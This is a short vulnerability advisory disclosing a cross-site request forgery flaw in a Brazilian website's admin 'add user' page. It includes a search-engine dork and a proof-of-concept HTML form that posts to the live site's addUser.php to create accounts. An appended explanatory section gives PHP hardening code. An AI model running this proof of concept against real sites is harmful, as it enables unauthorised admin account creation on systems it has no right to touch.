Contábil Bandeirantes CSRF Vulnerability

2018.09.08
indoushka (DZ)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

======================================================================================================================================
| # Title     : Contábil Bandeirantes CSRF Vulnerability
| # Author    : indoushka
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)
| # Vendor    : http://rodyrafa.com.br/
| # Dork      : http://www.cbandeirantes.com.br/noticiasread.php?id_not=69
======================================================================================================================================

poc :

[+] Dorking In Google Or Other Search Engine .
[+] Save code as poc.html
[+]

<section id="main" class="column" style="height: 680px;">
  <h4 class="alert_info">Necessário preencher todos os campos.</h4>
  <!--<h4 class="alert_warning">A Warning Alert</h4>
  <h4 class="alert_error">An Error Message</h4>
  <h4 class="alert_success">A Success Message</h4>-->
  <article class="module width_full">
    <form action="http://www.cbandeirantes.com.br//admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">
      <header><h3>Adicionar Usuários</h3></header>
      <div class="module_content">
        <fieldset>
          <label>Nome</label>
          <input name="nome" id="nome" value="" type="text">
        </fieldset>
        <fieldset>
          <label>Email</label>
          <input name="email" id="email" value="" type="text">
        </fieldset>
        <fieldset>
          <label>Senha</label>
          <input name="senha" id="senha" value="" type="text">
        </fieldset>
        <div class="clear"></div>
      </div>
      <footer>
        <div class="submit_link">
          <input id="limpar" name="limpar" value="limpar" type="submit">
          <input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">
        </div>
      </footer>
    </form>
  </article><!-- end of post new article -->
  <div class="spacer"></div>
</section>

Greetings to :
=======================================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * shadow_00715 * yasMouh |
=======================================================================================================================================
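The PoC works because the admin endpoint accepts the "add user" POST on the strength of the administrator's session cookie alone: nothing in the request proves it came from a page the site itself served, so a form hosted anywhere can create an account while the admin is logged in. The following is an added example, not the vendor's code and not part of the advisory, of how such a handler is hardened with a per-session anti-CSRF token (checked in constant time), an Origin/Referer check as defence in depth, and a SameSite session cookie. The file layout, the session key name, the `ALLOWED_ORIGIN` host and the form field types are assumptions.

```php
<?php
// Added example, not code from the advisory or the vendor: a CSRF-hardened
// "add user" admin handler showing what the vulnerable form above lacks.
// The session key and ALLOWED_ORIGIN value are assumptions.
declare(strict_types=1);

// Assumption: the admin site's own origin. Browsers send it as the Origin
// header on same-site form POSTs.
const ALLOWED_ORIGIN = 'https://admin.example.invalid';

// SameSite=Lax keeps the session cookie off cross-site form POSTs entirely,
// so on modern browsers a foreign poc.html arrives unauthenticated.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// One random token per session, created on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// The submitted value must be a string (not an array smuggled in as
// csrf_token[]) and must equal the session copy; hash_equals avoids a
// timing side channel on the comparison.
function csrf_token_is_valid($submitted): bool
{
    if (!is_string($submitted) || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Defence in depth: a form posted from an attacker's page carries that
// page's Origin (or, on older browsers, Referer), so only our own host passes.
function request_is_same_origin(string $allowedOrigin): bool
{
    $origin = $_SERVER['HTTP_ORIGIN'] ?? null;
    if ($origin !== null) {
        return $origin === $allowedOrigin;
    }
    $referer = $_SERVER['HTTP_REFERER'] ?? '';
    $prefix  = $allowedOrigin . '/';
    return strncmp($referer, $prefix, strlen($prefix)) === 0;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_token_is_valid($_POST['csrf_token'] ?? null)
        || !request_is_same_origin(ALLOWED_ORIGIN)) {
        http_response_code(403);
        // A 403 here is also the detection signal: log it so repeated
        // cross-site attempts against the admin area are visible.
        error_log('addUser: rejected cross-site request from '
            . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        exit('Request rejected.');
    }
    // Only at this point does the real user-creation logic run
    // (not shown: it is the vendor's code, which the page does not include).
}

// The legitimate form carries the token as a hidden field. A page on another
// origin cannot read it, so a forged POST can never supply a matching value.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
?>
<form action="/admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">
  <input type="hidden" name="csrf_token" value="<?= $token ?>">
  <fieldset><label>Nome</label><input name="nome" id="nome" type="text"></fieldset>
  <fieldset><label>Email</label><input name="email" id="email" type="email"></fieldset>
  <fieldset><label>Senha</label><input name="senha" id="senha" type="password"></fieldset>
  <input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">
</form>
```

The token check is the control that actually closes the hole; the Origin/Referer comparison and the SameSite cookie are layers that hold if a token check is ever forgotten on another admin page. Note that a request with neither Origin nor Referer is rejected by this example, which is the safe default for an admin-only endpoint but would need relaxing for clients that strip those headers. Rotating the token on login and logout (not shown) keeps a token leaked from an old session from being replayed.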

Copyright 2018, cxsecurity.com